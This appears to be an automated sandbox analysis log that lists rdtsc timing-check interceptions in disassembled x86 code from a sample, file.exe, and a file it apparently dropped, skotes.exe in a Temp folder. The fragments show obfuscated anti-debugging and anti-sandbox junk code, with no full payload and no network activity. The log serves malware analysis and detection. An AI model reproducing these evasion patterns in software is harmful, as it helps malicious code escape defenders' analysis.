                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610547 second address: 561057D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 jmp 00007FFAC168445Eh 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAC168445Ah 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561057D second address: 561058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561058C second address: 56105ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAC1684461h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FFAC1684463h 0x00000018 pop ecx 0x00000019 jmp 00007FFAC1684469h 0x0000001e popad 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56105ED second address: 5610682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAC0BDB477h 0x00000009 and ecx, 5EAB79DEh 0x0000000f jmp 00007FFAC0BDB479h 0x00000014 popfd 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b sub esp, 1Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FFAC0BDB474h 0x00000027 jmp 00007FFAC0BDB475h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FFAC0BDB470h 0x00000033 and cx, E368h 0x00000038 jmp 00007FFAC0BDB46Bh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610682 second address: 561069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC1684464h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561069A second address: 56106DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAC0BDB479h 0x00000012 xor cx, 2EE6h 0x00000017 jmp 00007FFAC0BDB471h 0x0000001c popfd 0x0000001d mov edx, eax 0x0000001f popad 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56106DA second address: 56106F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC1684468h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56106F6 second address: 5610732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAC0BDB46Dh 0x00000012 sbb cl, FFFFFFA6h 0x00000015 jmp 00007FFAC0BDB471h 0x0000001a popfd 0x0000001b mov dx, cx 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, edx 0x00000025 push edi 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610732 second address: 5610753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAC168445Eh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610753 second address: 5610759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610759 second address: 561078A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FFAC168445Eh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAC168445Ah 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561078A second address: 5610799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610799 second address: 56107CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAC1684463h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56107CE second address: 56107D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56107D2 second address: 56107D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56107D8 second address: 56107DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56107DE second address: 56107E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56107E2 second address: 5610806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAC0BDB479h 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610806 second address: 56108D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC1684467h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [76FBB370h] 0x00000012 jmp 00007FFAC1684464h 0x00000017 xor dword ptr [ebp-08h], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FFAC168445Dh 0x00000021 add cx, 9B56h 0x00000026 jmp 00007FFAC1684461h 0x0000002b popfd 0x0000002c popad 0x0000002d xor eax, ebp 0x0000002f pushad 0x00000030 push edx 0x00000031 mov ch, D5h 0x00000033 pop ebx 0x00000034 pushfd 0x00000035 jmp 00007FFAC1684462h 0x0000003a and eax, 2450F4A8h 0x00000040 jmp 00007FFAC168445Bh 0x00000045 popfd 0x00000046 popad 0x00000047 nop 0x00000048 pushad 0x00000049 push ecx 0x0000004a pushfd 0x0000004b jmp 00007FFAC168445Bh 0x00000050 xor al, FFFFFFEEh 0x00000053 jmp 00007FFAC1684469h 0x00000058 popfd 0x00000059 pop esi 0x0000005a call 00007FFAC1684461h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56108D5 second address: 56108F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAC0BDB473h 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56108F1 second address: 56108F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56108F7 second address: 56108FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56108FB second address: 56108FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56108FF second address: 5610938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAC0BDB478h 0x00000012 or ax, DE28h 0x00000017 jmp 00007FFAC0BDB46Bh 0x0000001c popfd 0x0000001d mov ebx, eax 0x0000001f popad 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610938 second address: 56109B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FFAC168445Eh 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 pushad 0x00000018 mov edx, eax 0x0000001a pushfd 0x0000001b jmp 00007FFAC168445Ah 0x00000020 add ax, F2E8h 0x00000025 jmp 00007FFAC168445Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov esi, dword ptr [ebp+08h] 0x0000002f pushad 0x00000030 pushad 0x00000031 call 00007FFAC1684462h 0x00000036 pop eax 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a push edx 0x0000003b mov cl, D5h 0x0000003d pop edi 0x0000003e popad 0x0000003f mov eax, dword ptr [esi+10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56109B1 second address: 56109B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56109B5 second address: 56109B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56109B9 second address: 56109BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56109BF second address: 56109D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC168445Fh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56109D2 second address: 5610AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e push eax 0x0000000f jmp 00007FFAC0BDB473h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FFAC0BDB479h 0x0000001b add ax, 8BD6h 0x00000020 jmp 00007FFAC0BDB471h 0x00000025 popfd 0x00000026 popad 0x00000027 jne 00007FFB3248A74Fh 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FFAC0BDB46Ch 0x00000034 adc ecx, 1DB7D9F8h 0x0000003a jmp 00007FFAC0BDB46Bh 0x0000003f popfd 0x00000040 mov di, ax 0x00000043 popad 0x00000044 sub eax, eax 0x00000046 pushad 0x00000047 jmp 00007FFAC0BDB471h 0x0000004c mov cx, 4A17h 0x00000050 popad 0x00000051 mov dword ptr [ebp-20h], eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 pushfd 0x00000058 jmp 00007FFAC0BDB476h 0x0000005d and ah, FFFFFFB8h 0x00000060 jmp 00007FFAC0BDB46Bh 0x00000065 popfd 0x00000066 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610AAA second address: 5610AB6 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov cx, 2401h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610AB6 second address: 5610AF0 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [esi] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAC0BDB475h 0x00000012 xor ch, 00000006h 0x00000015 jmp 00007FFAC0BDB471h 0x0000001a popfd 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610AF0 second address: 5610B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684467h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, si 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610B17 second address: 5610BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FFAC0BDB475h 0x0000000c adc ax, 6576h 0x00000011 jmp 00007FFAC0BDB471h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test ebx, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FFAC0BDB46Ch 0x00000023 sub eax, 45C94298h 0x00000029 jmp 00007FFAC0BDB46Bh 0x0000002e popfd 0x0000002f popad 0x00000030 je 00007FFB3248A573h 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a pushfd 0x0000003b jmp 00007FFAC0BDB477h 0x00000040 or ax, 580Eh 0x00000045 jmp 00007FFAC0BDB479h 0x0000004a popfd 0x0000004b popad 0x0000004c cmp ebx, FFFFFFFFh 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FFAC0BDB46Dh 0x00000056 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610BC4 second address: 5610390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov di, 961Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFB32F33501h 0x00000011 jne 00007FFAC1684479h 0x00000013 xor ecx, ecx 0x00000015 mov dword ptr [esi], ecx 0x00000017 mov dword ptr [esi+04h], ecx 0x0000001a mov dword ptr [esi+08h], ecx 0x0000001d mov dword ptr [esi+0Ch], ecx 0x00000020 mov dword ptr [esi+10h], ecx 0x00000023 mov dword ptr [esi+14h], ecx 0x00000026 mov ecx, dword ptr [ebp-10h] 0x00000029 mov dword ptr fs:[00000000h], ecx 0x00000030 pop ecx 0x00000031 pop edi 0x00000032 pop esi 0x00000033 pop ebx 0x00000034 mov esp, ebp 0x00000036 pop ebp 0x00000037 retn 0004h 0x0000003a nop 0x0000003b pop ebp 0x0000003c ret 0x0000003d add esi, 18h 0x00000040 pop ecx 0x00000041 cmp esi, 00F256A8h 0x00000047 jne 00007FFAC1684440h 0x00000049 push esi 0x0000004a call 00007FFAC1684CC3h 0x0000004f push ebp 0x00000050 mov ebp, esp 0x00000052 push dword ptr [ebp+08h] 0x00000055 call 00007FFAC5DB781Bh 0x0000005a mov edi, edi 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FFAC168445Bh 0x00000063 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600DE8 second address: 5600DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600DED second address: 5600E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 2766h 0x00000011 movsx ebx, si 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E0C second address: 5600E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E12 second address: 5600E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E16 second address: 5600E3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ch, dl 0x00000012 call 00007FFAC0BDB46Ch 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8DBF43 second address: 8DBF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8DBF47 second address: 8DBF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8EF13F second address: 8EF157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC1684462h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8EF2A1 second address: 8EF2D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 jmp 00007FFAC0BDB46Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007FFAC0BDB471h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8EF428 second address: 8EF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8EF891 second address: 8EF8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007FFAC0BDB466h 0x0000000b jmp 00007FFAC0BDB46Fh 0x00000010 pop edi 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8F1F22 second address: 8F1F81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAC1684458h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FFAC1684465h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FFAC1684458h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D2AE9h], edx 0x00000036 call 00007FFAC1684459h 0x0000003b jng 00007FFAC1684471h 0x00000041 push eax 0x00000042 push edx 0x00000043 jbe 00007FFAC1684456h 0x00000049 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8F1F81 second address: 8F1FAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAC0BDB46Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jc 00007FFAC0BDB474h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8F1FAD second address: 8F1FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAC1684456h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8F1FC0 second address: 8F205A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAC0BDB468h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jno 00007FFAC0BDB474h 0x00000014 pop eax 0x00000015 call 00007FFAC0BDB46Eh 0x0000001a cmc 0x0000001b pop esi 0x0000001c push 00000003h 0x0000001e adc cx, 1F45h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 and edi, dword ptr [ebp+122D2E71h] 0x0000002c pop ecx 0x0000002d push 00000003h 0x0000002f mov ecx, 4A69695Ch 0x00000034 push B24A687Fh 0x00000039 jmp 00007FFAC0BDB470h 0x0000003e add dword ptr [esp], 0DB59781h 0x00000045 jg 00007FFAC0BDB46Ch 0x0000004b mov esi, dword ptr [ebp+122D2F65h] 0x00000051 add dword ptr [ebp+122D3B94h], ecx 0x00000057 lea ebx, dword ptr [ebp+12456DD4h] 0x0000005d jmp 00007FFAC0BDB46Ch 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FFAC0BDB46Ah 0x0000006a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8F2171 second address: 8F2175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 8F2175 second address: 8F2196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FFAC0BDB46Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 91407C second address: 914087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FFAC1684456h 0x0000000a pop esi 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 914087 second address: 91408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 91408C second address: 9140A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jmp 00007FFAC1684462h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 9126E9 second address: 9126F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912958 second address: 912964 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAC1684456h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912964 second address: 912977 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jp 00007FFAC0BDB466h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912977 second address: 912983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912983 second address: 91298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFAC0BDB466h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912ADB second address: 912AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912AE1 second address: 912AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912AE7 second address: 912AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFAC1684456h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912AF1 second address: 912B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FFAC0BDB466h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912DCD second address: 912DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912DD7 second address: 912DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912F5C second address: 912F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC168445Dh 0x00000009 jmp 00007FFAC168445Eh 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 912F7B second address: 912F96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFAC0BDB472h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
